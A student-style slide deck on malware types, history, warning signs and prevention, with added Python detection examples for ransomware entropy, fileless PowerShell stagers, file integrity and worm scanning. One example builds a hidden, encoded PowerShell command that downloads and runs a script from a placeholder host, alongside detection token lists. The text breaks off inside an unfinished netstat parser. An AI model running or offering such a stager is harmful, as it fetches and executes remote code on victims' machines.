
MALWARE ATTACKS

BY: GROUP 1
01
WHAT IS MALWARE?

Malware ("malicious software") is an umbrella term for programs that are delivered to and
installed on end-user systems and servers with the intent to cause harm. A malware attack uses
such a program to damage, disrupt or take control of a computer, server or network, and
cybercriminals most often use it to steal data or resources for financial gain.
02
HISTORY OF MALWARE

Most computer historians date the first self-replicating program to 1971, when Bob Thomas's
Creeper spread between machines on ARPANET (a precursor of the internet). Where it ran, it
displayed the message "I'm the creeper, catch me if you can!" Creeper was an experiment rather
than an attack, and it is usually classed as a worm rather than a virus.
The term "computer virus" was not formally defined until 1984, when Ph.D. student Fred Cohen
described it as a program that can infect other programs by modifying them to include a possibly
evolved copy of itself. Most early viruses destroyed files or infected boot sectors. Today's
malware is far more purposeful: it is built to steal data, spy on businesses, create a
denial-of-service condition, or lock files to extort money from victims.
03
WHAT IS THE INTENT OF MALWARE?

Attackers use malware for a range of malicious purposes. In most cases the purpose is to steal
critical information or resources for monetary gain: malware is the tool used to compromise
networks or specific devices and to steal or tamper with sensitive data such as credit card
numbers or login credentials. In other cases malware is intended purely to cause havoc and
sabotage, disrupting the operation of the victim's systems.
04
WHY IS MALWARE USED?

Hacking is a business, and malware is one tool hackers use to steal data or control devices.
Cybercriminals pick the malware that fits the job. For example, ransomware is used to extort
money from businesses, while Mirai infects poorly secured IoT devices and enlists them in a
botnet used for distributed denial-of-service (DDoS) attacks.
05
WHY ATTACKERS USE MALWARE:

• Trick users into entering personally identifiable information (PII).
• Steal financial data such as credit card numbers or bank account details.
• Give attackers remote access to and control of devices.
• Use the victim's computing resources to mine cryptocurrency (cryptojacking).
06
HOW DO YOU GET MALWARE?

Antivirus software blocks much known malware, so malware authors invest in strategies to bypass
the security controls installed on endpoints and networks (packing, obfuscation, fileless
techniques and abuse of legitimate tools). A user can become a victim through many vectors:
phishing emails carrying malicious attachments or links, drive-by downloads from compromised
websites, trojanized software downloads, infected removable media, and exploitation of
unpatched, internet-exposed services.
07
HERE ARE A FEW SIGNS THAT YOU MIGHT HAVE MALWARE

• SLOW COMPUTER
• CONSTANT POP-UPS
• BLUE SCREEN OF DEATH (BSOD)
• UNEXPLAINED DISK SPACE USAGE OR DATA LOSS
• UNEXPECTED NETWORK ACTIVITY
• CHANGES TO BROWSER SETTINGS
• ANTIVIRUS IS DISABLED
08
HOW CAN I TELL IF I HAVE MALWARE?

Even though malware tries to run silently in the background, the resources it consumes and the
effects of its payload are telltale signs that a computer is infected. Confirming some infections
takes an experienced analyst, but anyone can recognise the signs above and investigate further.
09
TYPES OF MALWARE

• Ransomware
• Adware
• Fileless malware
• Viruses
• Worms
• Trojans
10
RANSOMWARE

Ransomware is a type of malware that prevents or limits users from accessing their system,
either by locking the system's screen or by locking the users' files until a ransom is paid. More
modern ransomware families, collectively categorised as crypto-ransomware, encrypt certain file
types on infected systems and force users to pay the ransom through online payment methods
(usually cryptocurrency) to obtain a decryption key. Many current operations also steal data
before encrypting it and threaten to publish it if the ransom is not paid (double extortion), so
backups alone do not remove the pressure to pay.
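Crypto-ransomware leaves a distinctive trail on the host: one process rewrites many user files in a short time, the new contents look random (encrypted data is close to 8 bits of entropy per byte), and the files are renamed with a new extension. The following Python block is an added example written for this page, not code from the original deck or from any product; it applies that heuristic to constructed file-write events. The process names, file paths, extension list and thresholds are all assumptions chosen for illustration.

```python
import math
import os
import random
from collections import Counter
from dataclasses import dataclass

# Extensions commonly appended by crypto-ransomware. Assumed list, not exhaustive.
SUSPECT_EXTENSIONS = {".locked", ".encrypted", ".crypt"}


@dataclass(frozen=True)
class WriteEvent:
    process: str   # image name of the writing process
    path: str      # file written (after any rename)
    data: bytes    # content written


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means every byte value is equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def assess_processes(events, entropy_threshold=7.0, min_files=5):
    """Return {process: True/False}. True when a process wrote at least
    min_files files that look encrypted or carry a ransom extension.
    Encrypted or compressed data sits near 8 bits/byte; documents and
    source code are well below the threshold."""
    stats = {}
    for ev in events:
        s = stats.setdefault(ev.process, {"files": set(), "high_entropy": 0, "renamed": 0})
        s["files"].add(ev.path)
        if shannon_entropy(ev.data) >= entropy_threshold:
            s["high_entropy"] += 1
        if os.path.splitext(ev.path)[1].lower() in SUSPECT_EXTENSIONS:
            s["renamed"] += 1
    return {
        proc: len(s["files"]) >= min_files
        and (s["high_entropy"] >= min_files or s["renamed"] >= min_files)
        for proc, s in stats.items()
    }


# Constructed sample events (not real telemetry). A fixed seed keeps the run deterministic.
_rng = random.Random(1)
PLAINTEXT = b"Quarterly report: revenue grew 4% year over year. " * 80

SAMPLE_EVENTS = [
    WriteEvent("winword.exe", "C:\\Users\\alice\\Documents\\report.docx", PLAINTEXT),
    WriteEvent("winword.exe", "C:\\Users\\alice\\Documents\\notes.docx", PLAINTEXT[:500]),
] + [
    # Eight user files rewritten with random-looking bytes and a new extension.
    WriteEvent("svchost_update.exe",
               f"C:\\Users\\alice\\Documents\\file{i}.docx.locked",
               bytes(_rng.getrandbits(8) for _ in range(4096)))
    for i in range(8)
]

if __name__ == "__main__":
    for proc, suspicious in assess_processes(SAMPLE_EVENTS).items():
        print(f"{proc:20} {'RANSOMWARE-LIKE' if suspicious else 'ok'}")
```

Run it and the second process is flagged while Word is not. Archives, images and already-encrypted files are high-entropy too, so real endpoint products combine entropy with canary (decoy) files, rename rates and known-extension lists; detection buys time, but recovery still depends on offline backups.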
11
EXAMPLE OF RANSOMWARE
HOW TO PREVENT? 12
•Never click on unsafe links: Avoid clicking on links in spam messages or on unknown websites.
A malicious link can start a download automatically (a drive-by download), which can lead to
your computer being infected.
•Avoid disclosing personal information: If you receive a call, text message, or email from an
untrusted source requesting personal information, do not reply. Cybercriminals planning a
ransomware attack may collect personal information in advance and use it to tailor phishing
messages to you. If in any doubt about whether a message is legitimate, contact the sender
directly through a channel you already trust.
•Do not open suspicious email attachments: Ransomware can also reach your device through email
attachments. Avoid opening dubious-looking attachments. To check that an email is trustworthy,
pay close attention to the sender and verify that the address is correct. Never enable macros
or "content" in an attachment that asks you to do so in order to view it: if the attachment is
malicious, enabling macros runs code that hands control of your computer to the malware.
•Never use unknown USB sticks: Never connect USB sticks or other storage media to your computer
if you do not know where they came from. Cybercriminals may have infected the storage medium and
left it in a public place to entice somebody into using it.
HOW TO PREVENT? 13
•Keep your programs and operating system up to date: Regularly updating programs and operating
systems protects you from malware that exploits known vulnerabilities. Install security patches
promptly; this makes it harder for cybercriminals to exploit vulnerabilities in your programs.
•Use only known download sources: To minimise the risk of downloading ransomware, never
download software or media files from unknown sites. Rely on the vendor's own site or other
verified, trustworthy sources. Note that "https" in the address bar and the padlock symbol only
mean the connection is encrypted; they say nothing about whether the site or the download is
safe, and malware is routinely served over https. Exercise the same caution on mobile devices:
prefer the Google Play Store or the Apple App Store, which screen submissions, while remembering
that malicious apps occasionally slip through.
•Use VPN services on public Wi-Fi networks: Conscientious use of public Wi-Fi networks is a
sensible protective measure. On a public Wi-Fi network your traffic can be observed or tampered
with by others on the network. To stay protected, avoid using public Wi-Fi for sensitive
transactions or use a trusted VPN service. A VPN protects traffic in transit; it does not stop
ransomware that arrives in an attachment or a download.
14
ADWARE

Adware is short for advertising-supported software: software designed to display advertisements
on your screen, most often within a web browser. The malicious kind installs itself on your
device without clear consent, displays unwanted advertisements and pop-ups, and in some cases
tracks your online behaviour to serve personalised ads. Some security professionals view it as
the forerunner of the modern-day PUP (potentially unwanted program).
15
2 TYPES OF ADWARE

Legitimate adware
Legitimate adware is downloaded with the user's express consent. Users download this form
of adware knowingly and will usually get something in return. They may get a discount or free
software in exchange for receiving the adware. The ads help cover the cost of developing the
software or let the developer provide the product free.

For example, some software is offered either free, as an advertising-supported version, or as a
paid version without advertisements. Users wanting an ad-free experience can buy the paid
version.
16
2 TYPES OF ADWARE

Malicious adware
Deceptive or abusive adware makes it difficult for the user to refuse consent or uses deceptive
means to gain the user's consent. For example, it may bombard the user with unwanted
advertisements or make it difficult to opt out of bundled third-party software.
Adware is considered malicious when it is designed with the intent of delivering malicious
software to the user. However, even legal adware may unintentionally create vulnerabilities
that malware can take advantage of.
17
EXAMPLE OF ADWARE
HOW TO PREVENT? 18

•Use antivirus software. The easiest way to block adware is to use antivirus software that can
detect it before it infects the rest of your device. The program quarantines the adware, moving
it to an isolated location where it cannot run, until you decide to delete or restore it.
•Perform updates. Software updates may contain security patches, so update your device as soon
as you can.
•Only download apps from known app stores. The App Store and the Google Play Store scan
submitted apps for malware (imperfectly, but far better than nothing). If you jailbreak or root
your device and sideload apps, you lose that screening and may install malicious apps. Stick to
the official stores unless you have a specific reason not to.
•Don't click on pop-up ads. Resist clicking on pop-up ads, however tempting the offer, as they
may deliver further PUPs/PUAs.
•Beware of phishing. Phishing is sophisticated these days. Emails, links, and websites may appear
legitimate, so check their legitimacy before clicking, for example with a URL checker such as the
Safe Browsing site status tool in Google's Transparency Report.
19
FILELESS MALWARE

A fileless attack abuses software, applications, and protocols that are already present on the
target to perform malicious activity. Threat actors use fileless techniques to gain control of
targets without writing a malicious executable to disk, at least in the first phase of the attack.
During a fileless attack, threat actors infiltrate, take control, and act by exploiting vulnerable
software that an end user might use daily, such as Microsoft Word or the Chrome browser, or
software already deployed on a server.
Threat actors then "live off the land", abusing native operating system tools such as PowerShell,
WMI, mshta or rundll32, which are trusted, signed, and often allowed to run with high privileges.
These tools let actors run commands, persist, and move laterally across a network.
Fileless attacks are increasingly common because signature-based antivirus inspects files on
disk; code that lives only in memory, in the registry, or inside a legitimate signed process
leaves no file to scan. As a result, a fileless attack can serve as a point of entry that goes
completely overlooked unless behaviour-based tools (EDR, script logging) are in place.
20
2 TYPES OF FILELESS MALWARE

Memory Code Injection
With memory code injection, the malicious code that powers fileless malware is hidden inside the
memory of an otherwise innocent application. Often the programs chosen for this kind of attack
are essential to important processes, so they cannot simply be blocked. The malware executes its
code within these authorised processes.
In many cases these attacks use vulnerabilities in programs such as Flash and Java (historically)
as well as browsers. It is also common for an attacker to use a phishing campaign to penetrate the
victim's system. Once the malware has gained access, it executes code inside the target
computer's memory rather than from an application written by the attacker.
21
2 TYPES OF FILELESS MALWARE

Windows Registry Manipulation
With Windows registry manipulation, the attacker uses a malicious link or file that takes
advantage of a trusted Windows process. After a user clicks on the link, for example, that
process is used to store encoded script in the registry and to add a small autostart entry
(for example a Run key that invokes PowerShell or mshta) which reads and executes the stored
code at every logon. No script file is written to disk.
Like memory code injection, by working through the registry instead of through a malicious
application file, this kind of fileless malware can hide from traditional detection tools such
as antivirus software.
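Both fileless techniques above leave traces in process-creation and registry telemetry even though no malicious file is written: the launcher command line typically runs PowerShell hidden with a base64 -EncodedCommand, and the persistence lives in a Run key that invokes a script host. The Python below is an added example for this page, not code from the deck or from any vendor: it decodes -EncodedCommand (base64 of UTF-16LE text), scores command lines and Run-key values for such indicators, and runs on constructed sample records. The token lists, the example.invalid URL and the process and registry values are assumptions.

```python
import base64
import re

# Tokens typical of script-based, fileless stagers. Assumed heuristic list, not exhaustive.
SUSPICIOUS_TOKENS = (
    "iex ", "invoke-expression", "downloadstring", "frombase64string",
    "-nop", "-w hidden", "-windowstyle hidden", "-executionpolicy bypass",
)
# Autostart locations abused for registry-resident persistence.
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")
# Built-in script hosts that a Run value should rarely launch on a workstation.
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "rundll32", "regsvr32")

ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str):
    """Return the list of reasons a command line looks like a fileless stager."""
    reasons = []
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded[:60])
        text += " " + decoded          # score the decoded script too
    low = text.lower()
    reasons += ["token: " + tok for tok in SUSPICIOUS_TOKENS if tok in low]
    return reasons


def score_registry_event(key: str, value_data: str):
    """Flag Run-key values that launch a script host, plus whatever the command line reveals."""
    if not any(k in key.lower() for k in RUN_KEYS):
        return []
    reasons = []
    if any(h in value_data.lower() for h in SCRIPT_HOSTS):
        reasons.append("autostart value launches a script host")
    return reasons + score_command_line(value_data)


# Constructed sample records (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
MALICIOUS_CMD = f"powershell.exe -nop -w hidden -enc {ENCODED}"
BENIGN_CMD = "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1"
RUN_KEY = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
MALICIOUS_VALUE = MALICIOUS_CMD
BENIGN_VALUE = "\"C:\\Program Files\\Vendor\\Updater.exe\" /background"

if __name__ == "__main__":
    for label, cmd in (("malicious", MALICIOUS_CMD), ("benign", BENIGN_CMD)):
        print(label, "process:", score_command_line(cmd) or "clean")
    for label, val in (("malicious", MALICIOUS_VALUE), ("benign", BENIGN_VALUE)):
        print(label, "Run key:", score_registry_event(RUN_KEY, val) or "clean")
```

In Sysmon terms the inputs correspond to Event ID 1 (process creation, which carries the command line) and Event ID 13 (registry value set); PowerShell script block logging (Event ID 4104) records the decoded script directly and is the better source where it is enabled.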
22
EXAMPLE OF FILELESS MALWARE
HOW TO PREVENT? 23

1.Keep Your System Updated: Ensure your operating system, antivirus software, and other
applications are updated regularly. Updates often include patches for the vulnerabilities that
fileless attacks exploit to gain their first foothold.
2.Use Trusted Sources: Download software and files only from reputable sources. Avoid downloading
from unfamiliar websites or clicking on suspicious links in emails.
3.Enable Firewall: Activate your system's firewall to monitor incoming and outgoing traffic.
Firewalls help block unauthorised access to your computer.
4.Install Antivirus Software: Use reputable antivirus software and keep it updated. Modern
products add behaviour monitoring and memory scanning, which is what catches fileless activity
that a file scan misses.
5.Scan Downloads: Before opening or executing downloaded files, scan them with antivirus software
to detect any malicious content.
6.Be Cautious with Email Attachments: Exercise caution when opening email attachments, especially
from unknown senders. Malware often spreads through email attachments.
7.Enable Popup Blockers: Configure your web browser to block pop-ups, as they can be used to
deliver malware or phishing attempts.
8.Log and Restrict Script Hosts: Because fileless attacks abuse built-in tools, enable PowerShell
script block logging and restrict or disable script hosts (PowerShell, mshta, wscript) for users
who do not need them.
24
VIRUSES

A computer virus is a type of malware that attaches itself to another program or file (an
executable, or a document with macros) and replicates and spreads once a person runs it on their
system. For instance, you could receive an email with a malicious attachment, open the file
unknowingly, and the virus then runs on your computer. Viruses are harmful and can destroy data,
consume system resources, and log keystrokes.
COMMON SIGNS OF VIRUS 25

Speed of System
A computer system running slower than usual is one of the most common signs that the device
has a virus. This includes the system itself running slowly, as well as applications and internet
speed suffering. If a computer has no demanding applications installed and is still running
slowly, it may be infected with a virus.
Pop-up Windows
Unwanted pop-up windows appearing on a computer or in a web browser are a telltale sign of
malware, viruses, or spyware affecting the device.
Programs Closing or Failing to Start
If programs unexpectedly close by themselves, it is likely that the software has been affected by
some form of virus or malware. Another indicator is applications failing to load when selected
from the Start menu or their desktop icon. When that happens, your next step should be to run a
virus scan and quarantine any files or programs flagged as unsafe.
COMMON SIGNS OF VIRUS 26

Accounts Being Logged Out
Some viruses are designed to affect specific applications, which will either cause them to crash
or force the user to be logged out of the service automatically.
Crashing of the Device
System crashes and the computer unexpectedly shutting down are common indicators of a virus.
Computer viruses cause computers to behave in a variety of strange ways, which may include
opening files by themselves, displaying unusual error messages, or registering keystrokes at
random.
Mass Emails Being Sent from Your Email Account
Computer viruses are commonly spread via email. Hackers can use other people's email accounts
to spread malware and carry out wider cyberattacks. If your sent folder contains emails you did
not send, that may be a sign of a virus or of a compromised account.
Changes to Your Homepage
Any unexpected changes to a computer, such as your browser's homepage being amended or other
browser settings being updated, are signs that a virus may be present on the device.
TYPES OF VIRUSES 27

Resident Virus
Viruses propagate by infecting applications on a host computer. A resident virus stays loaded in
memory after its host program exits and infects other applications as the user opens them. A
non-resident virus runs only while its host runs and infects the executable files it can find at
that moment.
Multipartite Virus
A multipartite virus uses multiple methods to infect and spread: it typically stays in memory to
infect the boot sector and then spreads to more drives by altering executable files. This results
in performance lag and application memory running low.
Multipartite viruses can be avoided by not opening attachments from untrusted sources and by
installing trusted antivirus software. Removal requires cleaning both the boot sector and the
infected files on the disk, since either one left behind reinfects the other.
Direct Action
A direct action virus runs when its host file is executed, infects the programs it can reach (in
the current directory or along the directories historically listed in AUTOEXEC.BAT), and then
hands control back without staying resident. It typically only degrades system performance, but
it is capable of destroying all data on the hard disk and on any USB device attached to it.
Direct action viruses can be caught by antivirus scanners; they are easy to detect, and infected
files are usually easy to restore.
TYPES OF VIRUSES 28

Browser Hijacker
A browser hijacker silently changes the settings of web browsers, such as replacing the homepage,
editing the new tab page, and changing the default search engine. Technically it is not a virus
because it does not infect files, but it can be hugely damaging to users, who often cannot restore
their homepage or search engine. It can also contain adware that causes unwanted pop-ups and
advertisements.
Browser hijackers typically ride along with free software and malicious applications from
unverified websites or app stores, so only use trusted software and reliable antivirus software.
Overwrite Virus
Overwrite viruses are extremely dangerous. They replace the content of files with their own code,
destroying the original. Once a file is overwritten its content cannot be recovered from the file
itself, and the virus can affect Windows, DOS, Linux, and Apple systems. Removal means deleting
every infected file and restoring it from a clean backup, which can be devastating without one.
The best protection is a trusted, updated antivirus solution together with regular backups.
Web Scripting Virus
A web scripting virus exploits web browser and website weaknesses to inject web pages with
malicious client-side script (typically via cross-site scripting). This lets criminals attack
major websites, such as social networking sites, email providers, and any site that accepts user
input or reviews. Attackers can use the injected script to send spam, commit fraud, and steal
session cookies or credentials.
Protection relies on keeping the browser updated, real-time web protection in the browser or
antivirus, protective cookie settings, disabling or restricting scripts on untrusted sites, and
malicious software removal tools.
TYPES OF VIRUSES 29

File Infector
A file infector is one of the most common computer viruses. It inserts its code into executable
files, mainly those with .exe or .com extensions, so that the virus runs the next time the
program is launched, and it can quickly spread across systems and networks. The best way to avoid
file infector viruses is to only download official software and deploy an antivirus solution.
Network Virus
Network viruses are extremely dangerous because they can completely cripple entire computer
networks. They are often difficult to discover, as the virus could be hidden within any computer
on an infected network. These viruses replicate and spread through network shares and internet
connections to other devices on the network. Trusted, robust antivirus solutions and properly
configured firewalls are crucial to protecting against network viruses.
Boot Sector Virus
A boot sector virus targets a computer's master boot record (MBR) or the boot sector of a
partition. The virus places its code where the firmware or boot loader will execute it, so it is
loaded into memory every time the computer starts, before the operating system. Its presence is
signalled by boot-up problems, poor system performance, and the system failing to find the hard
disk. Most modern computers ship with safeguards (UEFI Secure Boot, and no bootable floppy
drives) that greatly restrict this type of virus.
Steps to protect against a boot sector virus include keeping removable media write-protected and
not starting up a computer with untrusted external drives connected.
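File infectors, overwrite viruses and multipartite viruses all change existing executables in place, which is exactly what a file-integrity check catches. The Python below is an added example for this page, not code from the deck: it records a SHA-256 manifest of executables while the system is known-clean, then diffs a later manifest to list modified, added and removed files. The directory layout and file contents are constructed in a temporary directory, and the set of monitored extensions is an assumption.

```python
import hashlib
import tempfile
from pathlib import Path

# Executable types a file infector targets. Assumed set; extend for your platform.
MONITORED_SUFFIXES = {".exe", ".com", ".dll"}


def sha256_file(path: Path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each monitored file (path relative to root, POSIX separators) to its hash."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in MONITORED_SUFFIXES
    }


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Compare a known-clean baseline against a fresh manifest."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline, then an in-place infection and a dropped binary."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "app.exe").write_bytes(b"MZ" + b"\x00" * 64 + b"original code")
        (root / "bin" / "tool.com").write_bytes(b"original tool")
        (root / "readme.txt").write_bytes(b"not monitored")   # ignored by the manifest
        baseline = build_manifest(root)

        # A file infector modifies an existing executable in place...
        with (root / "bin" / "app.exe").open("ab") as f:
            f.write(b"<appended viral code>")
        # ...and a dropper leaves a new executable behind.
        (root / "bin" / "dropper.exe").write_bytes(b"MZ new binary")

        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind:9} {files}")
```

The same idea underlies tools such as AIDE and Tripwire. Keep the baseline manifest somewhere the malware cannot rewrite it (read-only media or a separate host), and remember that a hash check only sees what touches disk: it will not catch the fileless techniques from the earlier slides.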
30
EXAMPLE OF VIRUS
31
WORMS

A computer worm is standalone malware that propagates or replicates itself from one system to
another. It can do this in a number of ways: exploiting vulnerabilities in network services,
abusing weak or stolen credentials, or mailing copies of itself. Unlike viruses, worms do not
need a host file to latch onto. After arriving and executing on a target system, a worm can carry
out a number of malicious tasks, such as dropping other malware, copying itself onto devices
physically attached to the affected system, deleting files, and consuming bandwidth.
WORMS VS. TROJAN VS. VIRUS 32

Cybercriminals have many attack methods at their disposal, and it can be easy to confuse them.
One common misconception is that computer worms are the same thing as viruses or Trojan horses,
but they differ in how they propagate (or don't).

•Worms spread from computer to computer and can move and operate independently, without a
human having to run anything. A worm's ability to send out hundreds or thousands of copies of
itself is one of its biggest dangers.
•Viruses are almost always attached to an executable file or document and remain dormant until
the victim activates them, either by opening an infected application, opening an infected file,
or clicking a link. Viruses do not spread without human action.
•Trojan horses are malware that disguises itself as legitimate software. Once run, a Trojan can
exfiltrate files, modify data, and delete files on your device. Generally, Trojan horses do not
attempt to inject themselves into other files or otherwise propagate themselves.
TYPES OF WORMS 33
Email Worms: As the name suggests, an email worm spreads via email. Also known as a mass-mailer
worm, an email worm distributes a copy of itself as an email attachment or as a link to an
infected file on a compromised or attacker-owned website.
File-Sharing Worms: File-sharing worms embed and disguise themselves as innocent media files.
When an unsuspecting user downloads and opens the file, the worm infects their device. Once the
worm has compromised the device, it can capture confidential information that the adversary can
use or sell to other attackers.
IM Worms: IM worms masquerade as attachments and links sent over instant-messaging and social
media platforms, and they frequently include content that baits the victim into clicking the URL.
Once executed, the IM worm spreads itself to the victim's contacts through the messaging network.
Cryptoworms: A cryptoworm is a worm that encrypts data on the victim's system and then demands a
ransom payment to regain access to the data, combining worm propagation with ransomware.
IRC Worms: An IRC worm is a malicious program designed to exploit IRC channels, infecting chat
rooms and message forums by sending infected messages or files.
P2P Worms: P2P worms use the mechanisms of peer-to-peer networks to distribute copies of
themselves to unsuspecting P2P users.
HOW TO PREVENT WORMS? 34

Preventing worms, which spread independently across networks and systems, requires a combination
of proactive measures and best practices. Here is how you can prevent worms:

1.Keep Your System Updated: Regularly update your operating system, software, and applications
with the latest security patches. Worms spread by exploiting known vulnerabilities in
network-facing services, so patching closes the door they rely on.
2.Use Firewalls: Enable and properly configure firewalls on your network and on individual
devices, and expose only the services that are needed. Firewalls monitor and control incoming
and outgoing network traffic, reducing the risk of worm infections and limiting how far one can
spread.
3.Install Antivirus Software: Use reputable antivirus software and keep it updated. Antivirus
programs can detect and remove worms and other types of malware from your system.
4.Enable Intrusion Detection and Prevention Systems (IDPS): Implement IDPS solutions to monitor
network traffic for suspicious activity, such as one host rapidly contacting many others on the
same port, and block potential worm attacks in real time.
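Point 4 calls for spotting worm activity in network traffic. A worm hunting for new victims contacts many hosts on the same service port in a short burst, a fan-out pattern that normal client behaviour rarely shows. The Python below is an added example for this page, not code from the deck or from any IDS: a sliding-window fan-out detector over constructed flow records, in which one host sweeps a subnet on TCP 445 (SMB, a frequent worm target) while another browses normally. The IP addresses, timestamps and thresholds are assumptions.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float    # seconds since an arbitrary epoch
    src: str
    dst: str
    dport: int


def detect_scanners(flows, window=60.0, fanout=20):
    """Return [(src, dport, distinct_targets)] for every source that contacted
    `fanout` or more distinct hosts on the same port within `window` seconds."""
    by_key = defaultdict(list)
    for f in flows:
        by_key[(f.src, f.dport)].append((f.ts, f.dst))

    alerts = []
    for (src, dport), events in by_key.items():
        events.sort()
        active = Counter()   # dst -> number of flows inside the current window
        left = 0
        for ts, dst in events:
            active[dst] += 1
            # Expire flows that fell out of the window.
            while events[left][0] < ts - window:
                old_dst = events[left][1]
                active[old_dst] -= 1
                if active[old_dst] == 0:
                    del active[old_dst]
                left += 1
            if len(active) >= fanout:
                alerts.append((src, dport, len(active)))
                break   # one alert per (source, port) is enough
    return alerts


# Constructed sample: 10.0.0.5 sweeps 10.0.1.0/24 on SMB in eight seconds;
# 10.0.0.9 talks to three web servers over several minutes.
SAMPLE_FLOWS = (
    [Flow(1000.0 + i * 0.2, "10.0.0.5", f"10.0.1.{i + 1}", 445) for i in range(40)]
    + [Flow(1000.0 + i * 30, "10.0.0.9", "10.0.2.10", 443) for i in range(10)]
    + [Flow(1100.0, "10.0.0.9", "10.0.2.11", 443), Flow(1150.0, "10.0.0.9", "10.0.2.12", 443)]
)

if __name__ == "__main__":
    for src, dport, n in detect_scanners(SAMPLE_FLOWS):
        print(f"possible worm: {src} reached {n} hosts on port {dport} within 60 s")
```

Tuning is the whole job: a vulnerability scanner or a backup server legitimately fans out, so allow-list them, and if your flow source records connection outcomes, counting only failed or half-open connections sharpens the signal considerably.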
35
EXAMPLE OF WORMS
36
TROJAN

A Trojan is sometimes called a Trojan virus or Trojan horse virus, but those terms are technically
incorrect. Unlike a virus or worm, a Trojan cannot replicate itself or self-execute. It requires
a specific, deliberate action from the user, who is tricked into running it.
Trojans are malware, and like most malware they are designed to damage files, redirect internet
traffic, monitor the user's activity, steal sensitive data, or set up backdoor access to the
system. Trojans may delete, block, modify, leak or copy data, which can then be held for ransom
or sold on the dark web.
HOW DO TROJANS WORK? 37

Unlike computer viruses, a Trojan cannot spread by itself, so it needs the user to run it. In
remote-access-Trojan terminology the component installed on the victim is called the "server"
(the attacker's controller is the "client"), so the user has to execute the installer or .exe
file for the Trojan to gain a foothold on the device.
Trojans spread through legitimate-looking emails and attachments, which are spammed to reach as
many inboxes as possible. When the email is opened and the malicious attachment is run, the
Trojan installs itself and registers a persistence mechanism (such as a Run key or a scheduled
task) so that it starts automatically every time the infected device is turned on.
Devices can also be infected by a Trojan through social engineering, which cyber criminals use to
coerce users into downloading a malicious application. The malicious file could be hidden in
banner advertisements, pop-up advertisements, or links on websites.
A computer infected by Trojan malware can also be used to spread it to other computers. A cyber
criminal turns the device into a zombie computer, which means they control it remotely without
the user knowing. Hackers can then use the zombie computer, together with others in a network of
compromised devices known as a botnet, to continue distributing malware.
COMMON TYPES OF TROJAN 38

1.Backdoor Trojan: A backdoor Trojan enables an attacker to gain remote access to a computer and
take control of it through a hidden channel. This lets the malicious actor do whatever they want
on the device, such as deleting files, rebooting the computer, stealing data, or uploading more
malware. Backdoor Trojans are frequently used to build a botnet from a network of zombie
computers.
2.Banker Trojan: A banker Trojan targets users' banking accounts and financial information. It
attempts to steal account data for credit and debit cards, e-payment systems, and online banking
systems, often by injecting itself into the browser.
3.Distributed denial-of-service (DDoS) Trojan: These Trojans turn the infected computer into a
participant in DDoS attacks. On command, it sends floods of requests, together with many other
infected machines, to overwhelm a target and cause a denial of service.
4.Downloader Trojan: A downloader Trojan runs on a computer that has already been compromised
and downloads and installs additional malicious programs. These could be further Trojans or other
types of malware such as adware.
5.Exploit Trojan: An exploit Trojan contains code or data that takes advantage of a specific
vulnerability in an application or operating system. The cyber criminal reaches the user through
a method like a phishing attack, then uses the embedded exploit against a known vulnerability.
6.Fake antivirus Trojan: A fake antivirus Trojan mimics legitimate antivirus software. It
pretends to detect and remove threats like a regular antivirus program, then extorts money from
users for removing threats that may be nonexistent.
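A backdoor Trojan has to hold a network socket open, either listening for the attacker or calling out to a command-and-control server, and that socket is owned by a process. The Python below is an added example for this page, not code from the deck: it parses `netstat -ano` style output and a PID-to-image map, both constructed here, and flags sockets owned by executables running from user-writable directories or listening on ports historically used by backdoors. The sample addresses (taken from the reserved TEST-NET ranges), paths and port list are assumptions.

```python
import re
from dataclasses import dataclass

# One `netstat -ano` row: proto, local addr:port, remote addr:port, optional state, PID.
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<raddr>\S+):(?P<rport>\S+)"
    r"(?:\s+(?P<state>[A-Z_]+))?\s+(?P<pid>\d+)\s*$"
)
# Directories an ordinary user can write to; a service binary has no business living there.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")
# Default ports of well-known backdoor tooling. Illustrative assumption, not a complete list.
KNOWN_BACKDOOR_PORTS = {4444, 31337}


@dataclass(frozen=True)
class Conn:
    proto: str
    laddr: str
    lport: int
    raddr: str
    rport: str
    state: str
    pid: int


def parse_netstat(text: str):
    conns = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
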